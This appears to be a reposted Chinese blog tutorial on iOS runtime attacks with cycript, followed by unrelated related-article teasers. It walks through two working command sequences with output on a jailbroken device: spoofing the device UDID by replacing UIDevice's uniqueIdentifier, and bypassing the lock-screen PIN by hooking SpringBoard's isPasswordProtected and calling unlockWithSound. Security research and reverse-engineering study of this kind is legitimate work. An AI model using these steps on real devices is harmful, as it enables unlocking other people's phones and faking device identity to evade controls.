iOS runtime攻击-cycript

2024-03-26 04:18
文章标签 攻击 ios runtime cycript

本文主要是介绍iOS runtime攻击-cycript,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

原文:
http://danqingdani.blog.163.com/blog/static/18609419520135193830786/
iOS runtime攻击,目前流行的有两种方式,一种是 动态链接库注入,通过编写定制的dylib文件与设置 DYLD_INSERT_LIBRARIES环境变量来修改API方法的实现(可参照 Mac hook-DYLD_INSERT_LIBRARIES中的例子 );还有一种方法就是利用objective-c runtime的消息机制的 特性,特别是 objc_msgSend, 来操作应用,其中以cycript这种混合了objective-c与javascript语法的工具为翘楚。接下来介绍一下使用cycript操纵iOS应用运行时的例子。

例子1:伪造UDID(UIDevice类说明)

第一步:选择待操作的进程 
danimato-iPod:~ root# cycript -p 8442(可以是进程id,也可以是进程名)

第二步:获得当前设备的UDID 
cy# [[UIDevice currentDevice] uniqueIdentifier];
@"a94b65f9ac84c9d5bb7f377d5122a622ea1addf6"

第三步:替换uniqueIdentifier实现方法的实现 
cy# UIDevice.messages['uniqueIdentifier'] = function(){ return @"tanjiti";}
function () {return Instance.box("tanjiti");}

第四步:检查替换后的UDID获取结果 
cy# [[UIDevice currentDevice] uniqueIdentifier];
@"tanjiti"

例子2: 解锁屏幕锁定PIN(SpringBoard/SBAwayController.h说明)

第一步: 选择待操作的进程 
danimato-iPod:~ root# cycript -p SpringBoard
第二步:检查设备是否开启了密码锁定功能(1表示锁定,0表示解锁) 
cy# [SBAwayController.sharedAwayController isPasswordProtected]
1
第三步:替换isPasswordProtected实现方法 
cy# SBAwayController.messages['isPasswordProtected']=function(){return NO;}
function () {return NO;}
第四步:检查替换后设备的锁定状态 (1表示锁定,0表示解锁) 
cy# [SBAwayController.sharedAwayController isPasswordProtected]
0
第五步:最后调用unlockWithSound方法来访问home屏幕 
cy# [SBAwayController.sharedAwayController unlockWithSound:1]
通过以上操作,成功解锁屏幕锁定

接下来会写一下runtime attack中的核心组件MobileSubstrate,与非常流行的Theos越狱开发框架。

参考:
http://iphonedevwiki.net/index.php/Cycript
http://iphonedevwiki.net/index.php/Cycript_Tricks

 

这篇关于iOS runtime攻击-cycript的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/847251

相关文章

安卓链接正常显示,ios#符被转义%23导致链接访问404

安卓链接正常显示,ios#符被转义%23导致链接访问404

原因分析: url中含有特殊字符 中文未编码 都有可能导致URL转换失败,所以需要对url编码处理  如下: guard let allowUrl = webUrl.addingPercentEncoding(withAllowedCharacters: .urlQueryAllowed) else {return} 后面发现当url中有#号时,会被误伤转义为%23,导致链接无法访问
阅读更多...
【iOS】MVC模式

【iOS】MVC模式

MVC模式 MVC模式MVC模式demo MVC模式 MVC模式全称为model(模型)view(视图)controller(控制器),他分为三个不同的层分别负责不同的职责。 View:该层用于存放视图,该层中我们可以对页面及控件进行布局。Model:模型一般都拥有很好的可复用性,在该层中,我们可以统一管理一些数据。Controlller:该层充当一个CPU的功能,即该应用程序
阅读更多...
速盾高防cdn是怎么解决网站攻击的?

速盾高防cdn是怎么解决网站攻击的?

速盾高防CDN是一种基于云计算技术的网络安全解决方案,可以有效地保护网站免受各种网络攻击的威胁。它通过在全球多个节点部署服务器,将网站内容缓存到这些服务器上,并通过智能路由技术将用户的请求引导到最近的服务器上,以提供更快的访问速度和更好的网络性能。 速盾高防CDN主要采用以下几种方式来解决网站攻击: 分布式拒绝服务攻击(DDoS)防护:DDoS攻击是一种常见的网络攻击手段,攻击者通过向目标网
阅读更多...
Golang进程权限调度包runtime

Golang进程权限调度包runtime

关于 runtime 包几个方法: Gosched:让当前线程让出 cpu 以让其它线程运行,它不会挂起当前线程,因此当前线程未来会继续执行GOMAXPROCS:设置最大的可同时使用的 CPU 核数Goexit:退出当前 goroutine(但是defer语句会照常执行)NumGoroutine:返回正在执行和排队的任务总数GOOS:目标操作系统NumCPU:返回当前系统的 CPU 核数量 p
阅读更多...
iOS剪贴板同步到Windows剪贴板(无需安装软件的方案)

iOS剪贴板同步到Windows剪贴板(无需安装软件的方案)

摘要 剪贴板同步能够提高很多的效率,免去复制、发送、复制、粘贴的步骤,只需要在手机上复制,就可以直接在电脑上 ctrl+v 粘贴,这方面在 Apple 设备中是做的非常好的,Apple 设备之间的剪贴板同步功能(Universal Clipboard)确实非常方便,它可以在 iPhone、iPad 和 Mac 之间无缝传输剪贴板内容,从而大大提高工作效率。 但是,iPhone 如何和 Wind
阅读更多...
Web安全之XSS跨站脚本攻击:如何预防及解决

Web安全之XSS跨站脚本攻击:如何预防及解决

1. 什么是XSS注入 XSS(跨站脚本攻击,Cross-Site Scripting)是一种常见的Web安全漏洞,通过注入恶意代码(通常是JavaScript)到目标网站的网页中,以此在用户浏览网页时执行。攻击者可以通过XSS获取用户的敏感信息(如Cookie、会话令牌)或控制用户浏览器的行为,进而造成信息泄露、身份冒用等严重后果。 2. XSS攻击类型 2.1 存储型XSS 存储型XS
阅读更多...
【前端安全】浅谈XSS攻击和防范

【前端安全】浅谈XSS攻击和防范

定义 XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。 恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 分类 大分类小分类原理非存储DOM型① 不需要经过服务器
阅读更多...
iOS项目发布提交出现invalid code signing entitlements错误。

iOS项目发布提交出现invalid code signing entitlements错误。

1、进入开发者账号,选择App IDs,找到自己项目对应的AppId,点击进去编辑, 2、看下错误提示出现  --Specifically, value "CVYZ6723728.*" for key "com.apple.developer.ubiquity-container-identifiers" in XX is not supported.-- 这样的错误提示 将ubiquity
阅读更多...
我的第一次份实习工作-iOS实习生-第三个月

我的第一次份实习工作-iOS实习生-第三个月

第三个月 这个月有一个考核项目,是一个电子书阅读器,组长说很重要,是我的实习考核项目。 我的项目XTReader,这是我参考网上的一些代码,和模仿咪咕阅读做的,功能还不完善,数据的部分是用聚合数据做的。要收费的。   还有阅读页面,基本功能实现了一下。使用了autolayout,自适应布局,也是第一次用网络,第一次用数据库,第一次用自动布局。还有很多不足。 做了一周多,有个问题一直没
阅读更多...
我的第一次份实习工作-iOS实习生-公司使用过的软件

我的第一次份实习工作-iOS实习生-公司使用过的软件

bittorrentsync 素材,文件同步软件 cornerstone svn 软件开发合作 mark man 测量坐标的软件 SQLLite Manager 数据库操作软件
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2